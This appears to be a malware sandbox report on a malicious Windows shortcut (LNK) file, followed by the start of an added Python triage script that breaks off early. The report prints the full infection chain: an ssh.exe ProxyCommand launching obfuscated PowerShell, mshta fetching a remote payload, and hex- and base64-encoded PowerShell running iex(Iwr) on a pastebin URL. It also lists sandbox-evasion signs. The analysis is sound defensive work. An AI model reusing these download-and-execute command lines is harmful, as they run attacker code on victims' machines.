        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: blib.pdb source: powershell.exe, 00000009.00000002.2436299417.0000029524A40000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($XXXXXXXXXXXXXXX)$ZZZZZZZZZZZZZZZ = [System.Text.Encoding]::UTF8.GetBytes("6yhuvEFAfycywevUmeXEmytuMEnURYvUsaGyjuCEtEgeDaTUpEvuMUsuZeByGYS=")$AAAAAAAAAAAAAAA = QQQQQQQQQQQQQQQQQQQQQQQ
        Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CC00BD pushad ; iretd 2_2_00007FF848CC00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477200BD pushad ; iretd 7_2_00007FF8477200C1

        Persistence and Installation Behavior

        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX (138 occurrences)
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX (28 occurrences)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477 (4 identical entries; 922337203685477 ms is INT64_MAX expressed in 100 ns ticks, i.e. an effectively unbounded wait rather than a timed sleep)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (12 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1816
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1448
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 797
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5772
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2008
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4924
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4759
        Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5268 | Thread sleep time: -922337203685477s >= -30000s (2 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120 | Thread sleep count: 797 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6632 | Thread sleep count: 218 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6304 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320 | Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1124 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200 | Thread sleep time: -19369081277395017s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216 | Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\Documents\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Temp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\Desktop\desktop.ini
        Source: ssh.exe, 00000000.00000002.2209926600.000001E7D3A89000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
        Source: mshta.exe, 00000005.00000003.2192577700.0000029153A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197047004.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
        Source: powershell.exe, 00000009.00000002.2439669604.0000029524D6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_
        Source: powershell.exe, 00000007.00000002.2183387067.0000022CF4021000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
        Source: mshta.exe, 00000005.00000003.2197047004.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWcy
        Source: powershell.exe, 00000009.00000002.2439669604.0000029524DB4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_`
        Source: mshta.exe, 00000005.00000003.2190556968.0000029153AA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197459842.0000029153AA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205615137.0000029153AA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3313335547.000001FDFF259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3312071099.000001FDFDA2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: mshta.exe, 00000005.00000002.2205829661.0000029153ACC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: powershell.exe, 00000009.00000002.2439669604.0000029524D32000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (4 identical entries)

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match | File source: amsi64_6568.amsi.csv, type: OTHER (2 identical entries)
        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Base64 decoded [NET.serVICepointMaNagEr]::SeCurITyPROTOCoL = [Net.sEcuRitYpROTOcoLTYpE]::Tls, [neT.sECUrITyPROTOCOLType]::Tls11, [neT.seCURityPROTOCOlTYpe]::Tls12, [net.sECuritypRoTocoltypE]::Ssl3 ; [nET.SErViCEPoinTMANageR]::SeCURityPrOtOcol = 'Tls, Tls11, Tls12, Ssl3' ; iex( Iwr ([chaR] 0X68 + [cHaR] 0X74 + [ChAr] 0X74 + [cHAR] 0x70 + [CHAR] 0x73 + [cHar] 0X3A + [CHaR] 0x2F + [ChAR] 0X2F + [chAr] 0X70 + [cHAr] 0x61 + [char] 0x73 + [CHAR] 0X74 + [CHAr] 0x65 + [chAr] 0X62 + [Char] 0X69 + [ChaR] 0x6E + [cHAr] 0X2E + [chAR] 0x63 + [CHar] 0x6F + [chAr] 0x6D + [ChAR] 0x2F + [ChaR] 0X72 + [ChAr] 0x61 + [ChAR] 0x77 + [chaR] 0x2F + [CHar] 0x30 + [cHAr] 0X76 + [chAR] 0X36 + [CHAR] 0X56 + [Char] 0x68 + [ChAR] 0X76 + [ChaR] 0X70 + [char] 0x62 )) (the [char] sequence assembles to https://pastebin.com/raw/0v6Vhvpb; Iwr fetches that URL and iex executes the response)
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']') (the -replace ']' strips the junk characters at run time, yielding mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4, as the following process-creation entry shows)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4
        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo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
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc 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
        Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')
        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function ehno($fvnow){return -split ($fvnow -replace '..', '0x$& ')};$mbao = ehno('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
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -executionpolicy remotesigned -enc iaagacaawwboaeuavaauahmazqbyafyasqbdaguacabvagkabgb0ae0ayqboageazwbfahiaxqa6adoauwblaemadqbyaekavab5afaaugbpafqatwbdag8ataagaakacqa9acaacqbbae4azqb0ac4acwbfagmadqbsagkadabzahaaugbpafqatwbjag8atabuafkacabfaf0aoga6afqababzacwaiaagafsabgblafqalgbzaeuaqwbvahiasqbuahkauabsae8avabpaematwbmafqaeqbwaguaxqa6adoavabsahmamqaxacwaiaajafsabgblafqalgbzaguaqwbvafiaaqb0ahkauabsae8avabpaematwbsafqawqbwaguaxqa6adoavabsahmamqayacwaiaajafsabgblahqalgbzaeuaqwb1ahiaaqb0ahkacabsag8avabvagmabwbsahqaeqbwaeuaxqa6adoauwbzagwamwagacaaowagaakaiabbag4arqbuac4auwbfahiavgbpaemarqbqag8aaqbuafqatqbbae4ayqbnaguaugbdadoaogbtaguaqwbvafiaaqb0ahkauabyae8adabpagmabwbsacaacqa9acaacqajaccavabsahmalaagaakavabsahmamqaxacwaiaagaakavabsahmamqayacwaiaajafmacwbsadmajwagacaacqa7acaaiaajagkazqb4acgaiaagacaasqb3ahiaiaajaakakabbagmaaabhafiaxqagacaacqawafganga4acaaiaajacaaiaajacsaiaagaakawwbjaegayqbsaf0aiaagaakamabyadcanaagacaacqagacaacqaracaaiaajafsaqwboaeeacgbdacaaiaajadaawaa3adqaiaagaakaiaagaakakwagacaacqbbagmasabbafiaxqagacaacqawahganwawacaaiaajacaaiaajacsaiaagaakawwbdaegaqqbsaf0aiaagaakamab4adcamwagacaacqagacaacqaracaaiaajafsaywbiageacgbdacaaiaajadaawaazaeeaiaagaakaiaagaakakwagacaacqbbaemasabhafiaxqagacaacqawahgamgbgacaaiaajacaaiaajacsaiaagaakawwbdaggaqqbsaf0aiaagaakamabyadiargagacaacqagacaacqaracaaiaajafsaywboaeeacgbdacaaiaajadaawaa3adaaiaagaakaiaagaakakwagacaacqbbagmasabbahiaxqagacaacqawahgangaxacaaiaajacaaiaajacsaiaagaakawwbjaggayqbyaf0aiaagaakamab4adcamwagacaacqagacaacqaracaaiaajafsaqwbiaeeaugbdacaaiaajadaawaa3adqaiaagaakaiaagaakakwagacaacqbbaemasabbahiaxqagacaacqawahganga1acaaiaajacaaiaajacsaiaagaakawwbjaggaqqbyaf0aiaagaakamabyadyamgagacaacqagacaacqaracaaiaajafsaqwboageacgbdacaaiaajadaawaa2adkaiaagaakaiaagaakakwagacaacqbbaemaaabhafiaxqagacaacqawahgangbfacaaiaajacaaiaajacsaiaagaakawwbjaegaqqbyaf0aiaagaakamabyadiarqagacaacqagacaacqaracaaiaajafsaywboaeeaugbdacaaiaajadaaeaa2admaiaagaakaiaagaakakwagacaacqbbaemasabhahiaxqagacaacqawahgangbgacaaiaajacaaiaajacsaiaagaakawwbjaggaqqbyaf0aiaagaakamab4adyaraagacaacqagacaacqaracaaiaajafsaqwboaeeaugbdacaaiaajadaaeaayaeyaiaagaakaiaagaakakwagacaacqbbaemaaabhafiaxqagacaacqawafganwayacaaiaajacaaiaajacsaiaagaakawwbdaggaqqbyaf0aiaagaakamab4adyamqagacaacqagacaacqaracaaiaajafsaqwboaeeaugbdacaaiaajadaaeaa3adcaiaagaakaiaagaakakwagacaacqbbagmaaabhafiaxqagacaacqawahgamgbgacaaiaajacaaiaajacsaiaagaakawwbdaegayqbyaf0aiaagaakamab4admamaagacaacqagacaacqaracaaiaajafsaywbiaeeacgbdacaaiaajadaawaa3adyaiaagaakaiaagaakakwagacaacqbbagmaaabbafiaxqagacaacqawafgamwa2acaaiaajacaaiaajacsaiaagaakawwbdaegaqqbsaf0aiaagaakamabyaduangagacaacqagacaacqaracaaiaajafsaqwboageacgbdacaaiaajadaaeaa2adgaiaagaakaiaagaakakwagacaacqbbaemaaabbafiaxqagacaacqawafganwa2acaaiaajacaaiaajacsaiaagaakawwbdaggayqbsaf0aiaagaakamabyadcamaagacaacqagacaacqaracaaiaajafsaywboageacgbdacaaiaajadaaeaa2adiaiaagaakakqapaa== (this command line was lower-cased by the sandbox; base64 is case-sensitive, so the blob cannot be decoded from the report, and the plaintext is the Base64 decoded entry above)
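Added triage example for the chain recorded above (this is the editor's code, not part of the Joe Sandbox report or of the sample): it re-implements the four obfuscation layers visible in the process-creation entries, namely the junk stripping done by -replace ']', the [char] 0xNN concatenation that builds the pastebin URL, the EhNo hex-pair split, and the -Enc base64/UTF-16LE encoding, then runs a few hand-written detection predicates over constructed process-creation records that mirror this chain and collects the URLs. The obfuscated strings are copied from the entries above; the record layout, predicate names and helper names are this example's own assumptions and do not claim to reproduce the Sigma rules the report cites. The decoder for -Enc also encodes the caveat that the blob quoted in this report was lower-cased by the sandbox, so it cannot be decoded from the page and the report's own Base64 decoded entry is the plaintext to work from.

```python
"""Triage of the ssh.exe -> powershell.exe -> mshta.exe -> powershell.exe chain.

Added example, not part of the Joe Sandbox report: it re-implements the
obfuscation layers visible in the process-creation entries above and runs a
few detection predicates over constructed process-creation records.  The
record layout, rule names and helper names are this example's own.
"""
import base64
import re
from typing import Iterable, Optional

# Obfuscated strings copied verbatim from the report's process entries.
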